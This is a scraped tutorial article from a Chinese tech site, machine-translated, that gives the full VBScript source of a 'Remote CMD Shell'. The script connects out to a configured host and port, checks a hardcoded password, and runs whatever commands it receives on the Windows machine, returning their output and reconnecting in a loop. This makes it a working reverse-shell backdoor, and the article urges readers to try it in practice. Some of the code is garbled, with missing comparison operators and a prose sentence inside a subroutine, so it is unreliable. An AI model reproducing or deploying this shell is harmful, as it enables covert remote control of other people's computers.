Shulou(Shulou.com)06/03 Report--

This article focuses on "how to write VBScript Enun Remote CMD Shell code", interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn how to write VBScript Enun Remote CMD Shell code.

The effect is as shown in the figure:

The copy code is as follows:

'= =

'Enun Remote CMDShell v 1. 0

'= =

Option Explicit

CONST ACCOUNT_LOCK_TIME = 600000 'account lockout time, 10 minutes

CONST LOCKOUT_BAD_COUNT = 3 'password failures

CONST DEFAULT_WAIT_TIME = 1000 'default delay, 1 second

CONST DEFAULT_TIME_OUT = 60000 'default timeout, 60 seconds

Public WinSocket, sRevData, Count

Do

On Error Resume Next

Do While (WinSocket.State 7)

Dim ObjectFSO, GetConfig, Line, Host, Port, i

Set WinSocket = WScript.CreateObject ("MSWinsock.Winsock")

Set ObjectFSO = CreateObject ("Scripting.FileSystemObject")

Set GetConfig = ObjectFSO.OpenTextFile (".\ enunrc.ini", 1)

For I = 1 To 3

Line = GetConfig.ReadLine

If InStr (Line, "Host") > 0 Then Host = Split (Line, "=",-1,1) (1)

If InStr (Line, "Port") > 0 Then Port = Split (Line, "=",-1,1) (1)

Next

If (Len (Host) = 0) Then Host = "127.0.0.1"

If (Len (Port) = 0) Then Port = "8090"

WinSocket.Protocol = 0

WinSocket.RemoteHost = Host

WinSocket.RemotePort = Port

WinSocket.Connect

WScript.Sleep DEFAULT_WAIT_TIME * 5

Call TrackScript (2, WinSocket.State, WinSocket.BytesReceived)

'Setp: 2

Loop

Do While (WinSocket.State 9 and WinSocket.State 0)

Dim AuthKey, LockoutBadCount, TIMEOUT_M, TIMEOUT_N

TIMEOUT_N = 0

WinSocket.SendData WinSocket.LocalHostName & "is Connected, Enter Password:"

Do While (WinSocket.BytesReceived = 0 and WinSocket.State 9 and WinSocket.State 0)

TIMEOUT_N = TIMEOUT_N + 1000

Call ControlTimeout (TIMEOUT_N)

Loop

WinSocket.GetData Authkey, vbString

If Split (Authkey, chr (10),-1,1) (0) = "veteran" Then

WinSocket.SendData "Logon Success, Welcome!" & vbcrlf

SRevData = "veteran"

Do While (WinSocket.BytesReceived = 0 and WinSocket.State 9 and WinSocket.State 0)

Dim ShellObj, Executes

Set ShellObj = CreateObject ("WScript.Shell")

Set Executes = ShellObj.Exec (Split (sRevData, chr (10),-1,1) (0))

WinSocket.SendData Executes.StdOut.ReadAll

WinSocket.SendData Executes.StdErr.ReadAll

If (Len (sRevData) > 0) Then

TIMEOUT_M = 0

WinSocket.SendData vbcrlf & "[" & WinSocket.LocalHostName & "@ enun] #:"

Else

Do While (WinSocket.BytesReceived = 0 and WinSocket.State 9 and WinSocket.State 0)

TIMEOUT_M = TIMEOUT_M + 1000

Call ControlTimeout (TIMEOUT_M)

Loop

End If

If (LCase (Left (sRevData, 4)) = "exit") Then WinSocket.Close

WinSocket.GetData sRevData, vbString

WScript.Sleep DEFAULT_WAIT_TIME

Call TrackScript (5, WinSocket.State, WinSocket.BytesReceived)

'Setp: 5

Loop

Else

LockoutBadCount = LockoutBadCount + 1

WinSocket.SendData "Logon fail: Unknown user name or bad password." & vbcrlf

WScript.Sleep DEFAULT_WAIT_TIME

End If

If (LockoutBadCount = LOCKOUT_BAD_COUNT) Then

WinSocket.SendData "Failed too many times, the account has been locked!" & vbcrlf

WScript.Sleep DEFAULT_WAIT_TIME

WinSocket.Close

LockoutBadCount = 0

WScript.Sleep ACCOUNT_LOCK_TIME

'Lock the account

End If

Call TrackScript (3, WinSocket.State, WinSocket.BytesReceived)

'Setp: 3

Loop

Call TrackScript (1, WinSocket.State, WinSocket.BytesReceived)

'Setp: 1

Loop

'=

'Control Timeout.

'=

Public Sub ControlTimeout (Count)

If Count = DEFAULT_TIME_OUT Then

WinSocket.SendData vbcrlf & "Local server response timeout, Please reconnect..." & vbcrlf

WScript.Sleep DEFAULT_WAIT_TIME

WinSocket.Close

If there is no input from the control side within 60 seconds, the connection will be disconnected automatically and can be connected immediately.

Else

WScript.Sleep DEFAULT_WAIT_TIME

End If

Call TrackScript (4, WinSocket.State, WinSocket.BytesReceived)

'Setp: 4

End Sub

'=

'Track Script.

'=

Public Sub TrackScript (MyStep, StateCode, BytesReceived)

WScript.echo "MyStep:" & MyStep & ", StateCode:" & StateCode & ", Received: & BytesReceived &" Bytes "

End Sub

At this point, I believe you have a deeper understanding of "how to write VBScript Enun Remote CMD Shell code". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.